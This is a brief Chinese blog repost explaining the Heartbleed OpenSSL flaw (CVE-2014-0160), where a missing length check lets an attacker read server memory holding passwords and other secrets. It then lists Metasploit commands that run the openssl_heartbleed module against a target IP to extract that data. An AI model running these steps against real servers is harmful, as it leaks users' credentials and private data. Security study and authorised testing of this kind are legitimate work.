心脏滴血与利用
Posted scholar-liu
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了心脏滴血与利用相关的知识,希望对你有一定的参考价值。
心脏滴血漏洞:
OpenSSL在实现TLS和DTLS的心跳处理逻辑时,存在编码缺陷。OpenSSL的心跳处理逻辑没有检测心跳包中的长度字段是否和后续的数据字段相符合,攻击者可以利用这一点,构造异常的数据包,来获取心跳数据所在的内存区域的后续数据。这些数据中可能包含了用户名,用户密码,用户邮箱等敏感信息。该漏洞允许攻击者从内存中读取多达64KB的数据。
;
获取心脏出血数据:
安装插件:shodan
>search heartbleed
>use auxiliary/scanner/ssl/openssl_heartbleed
>show options
>set RHOSTS xxx.xxx.xxx.xxx(IP)
>exploit
以上是关于心脏滴血与利用的主要内容,如果未能解决你的问题,请参考以下文章
(CVE-2014-0160) OpenSSL 心脏滴血漏洞
OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例